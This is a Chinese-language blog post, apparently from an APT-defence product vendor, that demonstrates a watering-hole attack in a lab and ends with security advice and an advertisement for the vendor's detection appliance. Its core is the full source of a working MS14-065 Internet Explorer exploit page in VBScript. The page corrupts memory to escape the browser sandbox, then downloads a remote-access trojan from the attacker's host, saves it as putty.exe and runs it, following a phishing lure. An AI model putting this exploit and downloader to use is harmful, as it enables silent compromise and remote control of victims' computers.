IE8水坑攻击案例展示 - APT防御产品

IE8水坑攻击案例展示

水坑攻击案例演示

一 简介

所谓“水坑攻击”,是指黑客通过分析被攻击者的网络活动规律,寻找被攻击者经常访问的网站的弱点,先攻下该网站并植入攻击代码,等待被攻击者来访时实施攻击。

所谓“水坑攻击”,是指黑客通过分析被攻击者的网络活动规律,寻找被攻击者经常访问的网站的弱点,先攻下该网站并植入攻击代码,等待被攻击者来访时实施攻击。这种攻击行为类似《动物世界》纪录片中的一种情节:捕食者埋伏在水里或者水坑周围,等其他动物前来喝水时发起攻击猎取食物。

水坑攻击属于APT攻击的一种,与钓鱼攻击相比,黑客无需耗费精力制作钓鱼网站,而是利用合法网站的弱点,隐蔽性比较强。在人们安全意识不断加强的今天,黑客处心积虑地制作钓鱼网站却被有心人轻易识破,而水坑攻击则利用了被攻击者对网站的信任。水坑攻击利用网站的弱点在其中植入攻击代码,攻击代码利用浏览器的缺陷,被攻击者访问网站时终端会被植入恶意程序或者直接被盗取个人重要信息。

二 演练场景

1.1 

2.1 实验环境

图片1.jpg 

2-1 攻击实验模拟图

l 个人终端:个人用户终端IP地址为192.168.12.19,操作系统为Win7;

l 服务器:即攻击者搭建的恶意网站,域名为www.exb-book.com,IP地址为192.168.12.190,操作系统为windows 2003。

2.2 实验技术原理

l MS14-065中的IE远程代码执行漏洞:

用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码;受影响的 IE版本为Internet Explorer 6 (IE 6)Internet Explorer 7 (IE 7)Internet Explorer 8 (IE 8)Internet Explorer 9 (IE 9)Internet Explorer 10 (IE 10) 和 Internet Explorer 11 (IE 11)。 

l 利用IE漏洞下载执行远控木马:

由于MS14-065漏洞能够获得系统当前用户权限,通过构造恶意代码,让用户在访问恶意网站后,自动下载某远控木马并运行,从而实现对个人用户终端的控制权限。

2.3 攻击代码

根据服务器的当前IP信息,利用IE MS14-065生成网页木马note.html,并将远控木马server.exe和note.html放在同一目录下。代码信息如下:

Note.html

<!doctype html>

<html>

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >

<head>

</head>

<body>

 

<SCRIPT LANGUAGE="VBScript">

 

function runmumaa() 

On Error Resume Next

Set objWsh = CreateObject("Wscript.Shell")

 

objWsh.run "cmd.exe /c echo >>C:\Windows\Temp\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>C:\Windows\Temp\text.vbs xPost.Open ""GET"",""http://192.168.12.190/server.exe"",0 & echo >>C:\Windows\Temp\text.vbs xPost.Send() & echo >>C:\Windows\Temp\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>C:\Windows\Temp\text.vbs sGet.Mode=3 & echo >>C:\Windows\Temp\text.vbs sGet.Type=1 & echo >>C:\Windows\Temp\text.vbs sGet.Open() & echo >>C:\Windows\Temp\text.vbs sGet.Write xPost.ResponseBody & echo >>C:\Windows\Temp\text.vbs sGet.SaveToFile ""C:\Windows\Temp\putty.exe"",2",0

objWsh.run "cscript.exe C:\Windows\Temp\text.vbs",0,true

wscript.sleep 10000

objWsh.run "C:\Windows\Temp\putty.exe"

document.write(Err.Description)

end function

 

</script>

 

<SCRIPT LANGUAGE="VBScript">

 

dim   aa()

dim   ab()

dim   a0

dim   a1

dim   a2

dim   a3

dim   win9x

dim   intVersion

dim   rnda

dim   funclass

dim   myarray

 

Begin()

 

function Begin()

  On Error Resume Next

  info=Navigator.UserAgent

 

  if(instr(info,"Win64")>0)   then

     exit   function

  end if

 

  if (instr(info,"MSIE")>0)   then 

             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   

  else

     exit   function  

             

  end if

 

  win9x=0

 

  BeginInit()

  If Create()=True Then

     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)

     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

 

     if(intVersion<4) then

         document.write("<br> IE")

         document.write(intVersion)

         runshellcode()                    

     else  

          setnotsafemode()

     end if

  end if

end function

 

function BeginInit()

   Randomize()

   redim aa(5)

   redim ab(5)

   a0=13+17*rnd(6)

   a3=7+3*rnd(5)

end function

 

function Create()

  On Error Resume Next

  dim i

  Create=False

  For i = 0 To 400

    If Over()=True Then

    '   document.write(i)     

       Create=True

       Exit For

    End If 

  Next

end function

 

sub testaa()

end sub

 

function mydata()

    On Error Resume Next

     i=testaa

     i=null

     redim  Preserve aa(a2)  

  

     ab(0)=0

     aa(a1)=i

     ab(0)=6.36598737437801E-314

 

     aa(a1+2)=myarray

     ab(2)=1.74088534731324E-310  

     mydata=aa(a1)

     redim  Preserve aa(a0)  

end function 

 

 

function setnotsafemode()

    On Error Resume Next

    i=mydata()  

    i=readmemo(i+8)

    i=readmemo(i+16)

    j=readmemo(i+&h134)  

    for k=0 to &h60 step 4

        j=readmemo(i+&h120+k)

        if(j=14) then

              j=0          

              redim  Preserve aa(a2)             

     aa(a1+2)(i+&h11c+k)=ab(4)

              redim  Preserve aa(a0)  

 

     j=0 

              j=readmemo(i+&h120+k)   

         

               Exit for

           end if

 

    next 

    ab(2)=1.69759663316747E-313

    runmumaa() 

end function

 

function Over()

    On Error Resume Next

    dim type1,type2,type3

    Over=False

    a0=a0+a3

    a1=a0+2

    a2=a0+&h8000000

  

    redim  Preserve aa(a0) 

    redim   ab(a0)     

  

    redim  Preserve aa(a2)

  

    type1=1

    ab(0)=1.123456789012345678901234567890

    aa(a0)=10

          

    If(IsObject(aa(a1-1)) = False) Then

       if(intVersion<4) then

           mem=cint(a0+1)*16             

           j=vartype(aa(a1-1))

           if((j=mem+4) or (j*8=mem+8)) then

              if(vartype(aa(a1-1))<>0)  Then    

                 If(IsObject(aa(a1)) = False ) Then             

                   type1=VarType(aa(a1))

                 end if               

              end if

           else

             redim  Preserve aa(a0)

             exit  function

 

           end if 

        else

           if(vartype(aa(a1-1))<>0)  Then    

              If(IsObject(aa(a1)) = False ) Then

                  type1=VarType(aa(a1))

              end if               

            end if

        end if

    end if

              

    

    If(type1=&h2f66) Then         

          Over=True      

    End If  

    If(type1=&hB9AD) Then

          Over=True

          win9x=1

    End If  

 

    redim  Preserve aa(a0)          

        

end function

 

function ReadMemo(add) 

    On Error Resume Next

    redim  Preserve aa(a2)  

  

    ab(0)=0   

    aa(a1)=add+4     

    ab(0)=1.69759663316747E-313       

    ReadMemo=lenb(aa(a1))  

   

    ab(0)=0    

 

    redim  Preserve aa(a0)

end function

 

</script>

 

</body>

</html>

2.4攻击步骤

Ø 发送钓鱼邮件至个人用户的邮箱,诱惑用户点击浏览www.exb-ook.com网站

图片2.png 

2-2:带有恶意网马的邮件

Ø 个人用户用IE打开浏览了挂有网马的恶意网站:

图片3.png 

2-3:个人用户浏览恶意网站

Ø 个人用户终端C:\Windows\Temp目录下下载的远控木马Putty.exe:

图片4.png 

图2-4:远控木马putty.exe

Ø 远控端获得个人用户终端的控制权限:

图片5.png 

2-5:个人终端权限被攻击者获取

三 安全建议

Ø 提高员工安全意识:

如果员工安全意识不够,企业网络很容易被简单的社交工程攻击攻破,因为很多攻击都是在以社交网络上查找到的企业高层管理人员以及特殊员工的真实信息为突破口,进而对企业网络进行渗透的。

Ø 加强关键数据保护:

“水坑式”攻击主要目的是窃取信息、干扰用户行为,攻击节点主要是“终端”,所以关键在于让敏感信息不被非授权用户访问和控制。在关键数据保护方面,紧靠加密是不够的,应该综合采用密钥管理、身份认证、访问控制等安全防护手段,对数据使用环境进行全方位的防护,要对服务器、台式机、U盘等数据使用环节进行防护,确保数据存储和使用安全。

Ø 铁穹高级持续性威胁预警系统:

    铁穹高级持续性威胁预警系统是专门针对日益严重的APT攻击中广泛使用的特种木马而研发的一款硬件设备。该产品部署在网络出口处采集网络通信数据,分析通信数据中的木马通信痕迹,识别木马特征和行为,在网络层实现对全网范围内木马识别与追踪,并能够对关键资产所遭受的损失进行审计。


转载请注明出处 APT防御产品 » IE8水坑攻击案例展示

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址